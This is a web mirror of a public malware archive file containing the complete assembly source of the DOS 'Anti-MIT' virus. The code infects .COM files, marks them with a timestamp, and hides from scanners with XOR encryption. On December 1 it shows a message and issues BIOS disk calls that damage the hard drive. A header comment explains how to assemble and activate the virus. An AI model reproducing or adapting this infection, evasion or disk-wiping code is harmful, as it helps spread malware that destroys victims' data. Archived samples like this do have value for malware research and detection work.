mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-06 18:35:27 +00:00
316 lines
8.8 KiB
NASM
316 lines
8.8 KiB
NASM
|
; ** Anti-MIT Virus **
|
|||
|
; To assemble, use TASM and TLINK to create a .COM file. Next
|
|||
|
; run the .COM file in the same directory of a file you want to infect.
|
|||
|
; Your system may hang, but after re-booting you will notice an increase
|
|||
|
; in the target files size. Now debug the newly infected file and replace
|
|||
|
; the first three bytes with E8 05 00 (call to encryption). Re-write the
|
|||
|
; .COM file and now you should have a running copy of the Anti-Mit virus!
|
|||
|
;
|
|||
|
; - Do not distribute the Anti-MIT virus for this
|
|||
|
; activity is against the law! The author will take
|
|||
|
; NO responsiblity for others.
|
|||
|
; TEST ONLY
|
|||
|
;
|
|||
|
; For more info see MIT.DOX file.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
name AntiMIT
|
|||
|
title Anti-MIT: The original Anti-MIT virus code!
|
|||
|
.radix 16
|
|||
|
code segment
|
|||
|
assume cs:code,ds:code
|
|||
|
org 100
|
|||
|
|
|||
|
buffer equ offset 20000d ; Buffer
|
|||
|
fname equ offset 20000d + 1eh ; DTA - File name
|
|||
|
ftime equ offset 20000d + 16h ; DTA - File time
|
|||
|
fsize equ offset 20000d + 1ah ; DTA - File size
|
|||
|
olddta equ 80 ; Old DTA area
|
|||
|
|
|||
|
start:
|
|||
|
jmp main ; *See above*
|
|||
|
nop
|
|||
|
jmp main ; Jmp to virus body
|
|||
|
|
|||
|
encrypt_val db 0 ; Randomized encryption value
|
|||
|
|
|||
|
decrypt: ; Encrypt/decrypt engine
|
|||
|
encrypt: ; [SKISM type]
|
|||
|
lea si, data
|
|||
|
mov ah, encrypt_val
|
|||
|
jmp fool_em ; Fool with the scanners
|
|||
|
|
|||
|
xor_loop:
|
|||
|
lodsb ; ds:[si] -> al
|
|||
|
xor al, ah
|
|||
|
stosb ; al -> es:[di]
|
|||
|
loop xor_loop
|
|||
|
mov ah,19h ; Set current drive as default
|
|||
|
int 21h
|
|||
|
mov dh,al
|
|||
|
mov ah,0eh
|
|||
|
int 21h
|
|||
|
ret
|
|||
|
|
|||
|
fool_em:
|
|||
|
mov di, si
|
|||
|
mov cx, stop_encrypt - data
|
|||
|
jmp xor_loop
|
|||
|
|
|||
|
|
|||
|
|
|||
|
data label byte ; Virus data
|
|||
|
message db 'MIT Sux! $' ; The "message"
|
|||
|
lengthp dw ? ; Length of infected file
|
|||
|
allcom db '*.COM',0 ; What to search for
|
|||
|
virus db '[Anti-MIT]',0 ; Virus name
|
|||
|
author db 'F<>rs<72>Str<74>k<EFBFBD>',0 ; Author
|
|||
|
|
|||
|
main: ; Main virus code
|
|||
|
mov ah,2ah ; Get the date
|
|||
|
int 21h
|
|||
|
|
|||
|
cmp dh,12d ; Month 12?
|
|||
|
jnz next ; No
|
|||
|
|
|||
|
|
|||
|
cmp dl,01d ; Day one?
|
|||
|
jnz next ; No
|
|||
|
lea dx,message ; Yes, set off the "bomb"
|
|||
|
mov ah,09h
|
|||
|
int 21h
|
|||
|
|
|||
|
mov ah,05h
|
|||
|
mov al,02h
|
|||
|
mov ch,00h
|
|||
|
mov dh,00h
|
|||
|
mov dl,80h
|
|||
|
int 13h
|
|||
|
|
|||
|
mov ah,06h
|
|||
|
int 13h
|
|||
|
|
|||
|
mov ah,05h
|
|||
|
mov dl,00h
|
|||
|
int 13h
|
|||
|
|
|||
|
mov ah,4ch ; Exit
|
|||
|
int 21h
|
|||
|
|
|||
|
next:
|
|||
|
mov cx,lengthp ; Figure out the Jmp
|
|||
|
sub cx,eendcode-start
|
|||
|
mov the_jmp,cx
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
push es ; Save ES
|
|||
|
mov ax,3524h ; Get interrupt 24h handler
|
|||
|
int 21h ; and save it in errhnd
|
|||
|
mov [err1],bx
|
|||
|
mov [err2],es
|
|||
|
pop es ; Restore ES
|
|||
|
|
|||
|
mov ax,2524h ; Set interrupt 24h handler
|
|||
|
lea dx,handler
|
|||
|
int 21h
|
|||
|
|
|||
|
xor dx,dx ; Set DTA in "buffer" area
|
|||
|
mov si,dx
|
|||
|
mov dx,buffer
|
|||
|
add dx,si ; Set new Disk Transfer Address
|
|||
|
mov ah,1A ; Set DTA
|
|||
|
int 21
|
|||
|
|
|||
|
|
|||
|
find_first:
|
|||
|
mov dx,offset allcom ; Search for '*.COM' files
|
|||
|
mov cx,00000001b ; Normal, Write Protected
|
|||
|
mov ah,4E ; Find First file
|
|||
|
int 21
|
|||
|
jc pre_done ; Quit if none found
|
|||
|
jmp check_if_ill
|
|||
|
|
|||
|
mover: ; The "mover" code
|
|||
|
push cs ; Store CS
|
|||
|
pop es ; and move it to ES
|
|||
|
mov di,0100h
|
|||
|
lea si,eendcode ; Move original code to
|
|||
|
add si,the_jmp ; beginning
|
|||
|
add si,endcode-mover
|
|||
|
mov cx,eendcode-start
|
|||
|
rep movsb
|
|||
|
mov di,0100h ; Jmp to CS:[100h]
|
|||
|
jmp di
|
|||
|
|
|||
|
pre_done:
|
|||
|
jmp done ; Long jmp
|
|||
|
|
|||
|
find_next:
|
|||
|
mov ah,4fh ; Search for next
|
|||
|
int 21h
|
|||
|
jc pre_done
|
|||
|
|
|||
|
check_if_ill: ; File infected?
|
|||
|
mov ax,cs:[ftime]
|
|||
|
and al,11111b ; Look for the 62 sec marker
|
|||
|
cmp al,62d/2 ; [Vienna type]
|
|||
|
jz find_next
|
|||
|
|
|||
|
cmp cs:[fsize],19000d ; Check if file larger then
|
|||
|
ja find_next ; 19000 bytes - if so skip
|
|||
|
|
|||
|
cmp cs:[fsize],500d ; Check if file smaller then
|
|||
|
jb find_next ; 500 bytes - if so skip
|
|||
|
|
|||
|
|
|||
|
mainlp: ; Write the virus
|
|||
|
mov dx,fname
|
|||
|
mov ah,43h ; Write enable
|
|||
|
mov al,0
|
|||
|
int 21h
|
|||
|
mov ah,43h
|
|||
|
mov al,01h
|
|||
|
and cx,11111110b
|
|||
|
int 21h
|
|||
|
|
|||
|
|
|||
|
mov ax,3d02h ; Open file (read/write)
|
|||
|
int 21h
|
|||
|
jc pre_done
|
|||
|
mov bx,ax
|
|||
|
|
|||
|
mov ax,5700h ; Get date for file
|
|||
|
int 21h
|
|||
|
mov [time],cx ; Save date info
|
|||
|
mov [date],dx
|
|||
|
|
|||
|
mov ah,3fh ; Read original code into
|
|||
|
mov dx,buffer ; buffer (length of virus)
|
|||
|
mov cx,eendcode-start
|
|||
|
int 21h
|
|||
|
jc pre_done
|
|||
|
cmp ax,eendcode-start
|
|||
|
jne pre_done
|
|||
|
|
|||
|
|
|||
|
mov ah,42h ; Go to end of file
|
|||
|
mov al,02h
|
|||
|
xor cx,cx
|
|||
|
xor dx,dx
|
|||
|
int 21h
|
|||
|
jc pre_done
|
|||
|
mov cx,ax
|
|||
|
mov lengthp,ax ; Save original program code
|
|||
|
|
|||
|
mov ah,40h ; Write "mover" code to end
|
|||
|
lea dx,mover ; of file
|
|||
|
mov cx,endcode-mover
|
|||
|
int 21h
|
|||
|
jc done
|
|||
|
cmp ax,endcode-mover
|
|||
|
jne done
|
|||
|
|
|||
|
mov ah,40h ; Write original program code
|
|||
|
mov dx,buffer ; to end of the file
|
|||
|
mov cx,eendcode-start
|
|||
|
int 21h
|
|||
|
jc done
|
|||
|
cmp ax,eendcode-start
|
|||
|
jne done
|
|||
|
|
|||
|
mov ah,42h ; Go to front of file
|
|||
|
mov al,00h
|
|||
|
xor cx,cx
|
|||
|
xor dx,dx
|
|||
|
int 21h
|
|||
|
jc done
|
|||
|
|
|||
|
stop_encrypt:
|
|||
|
mov ah,2ch ; Get time
|
|||
|
int 21h
|
|||
|
|
|||
|
mov encrypt_val,dh ; Use time as random encryption
|
|||
|
call encrypt ; value
|
|||
|
|
|||
|
mov ah,40h ; Write virus code to front of
|
|||
|
lea dx,start ; file
|
|||
|
mov cx,eendcode-start
|
|||
|
int 21h
|
|||
|
jc done
|
|||
|
cmp ax,eendcode-start
|
|||
|
jne done
|
|||
|
jmp date_stuff
|
|||
|
|
|||
|
handler:
|
|||
|
mov al,0
|
|||
|
iret
|
|||
|
endp
|
|||
|
|
|||
|
|
|||
|
time dw ? ; File stamp - time
|
|||
|
date dw ? ; File stamp - date
|
|||
|
err1 dw ? ; Original error handler
|
|||
|
err2 dw ? ; address
|
|||
|
|
|||
|
date_stuff: ; Restore old file stamp
|
|||
|
mov ax,5701h
|
|||
|
mov cx,[time]
|
|||
|
mov dx,[date]
|
|||
|
and cl,not 11111b ; Set seconds field to 62 secs.
|
|||
|
or cl,11111b
|
|||
|
int 21h
|
|||
|
mov ah,3eh
|
|||
|
int 21h
|
|||
|
mov dx,olddta ; Restore "original" DTA
|
|||
|
mov ah,1ah
|
|||
|
int 21h
|
|||
|
|
|||
|
push ds ; Save DS
|
|||
|
mov ax,2524h ; Set interrupt 24h handler
|
|||
|
mov dx,err1 ; Restore saved handler
|
|||
|
mov dx,err2
|
|||
|
mov ds,dx
|
|||
|
int 21h
|
|||
|
pop ds ; Restore DS
|
|||
|
|
|||
|
done:
|
|||
|
xor cx,cx ; Clear registors
|
|||
|
xor dx,dx
|
|||
|
xor bx,bx
|
|||
|
xor ax,ax
|
|||
|
xor si,si
|
|||
|
jmp_code db 0e9h ; Preform jmp to "mover" code
|
|||
|
the_jmp dw ?
|
|||
|
|
|||
|
go:
|
|||
|
eendcode label byte
|
|||
|
|
|||
|
nop ; krap
|
|||
|
nop
|
|||
|
nop
|
|||
|
nop
|
|||
|
nop
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
endcode label byte
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
code ends
|
|||
|
end start
|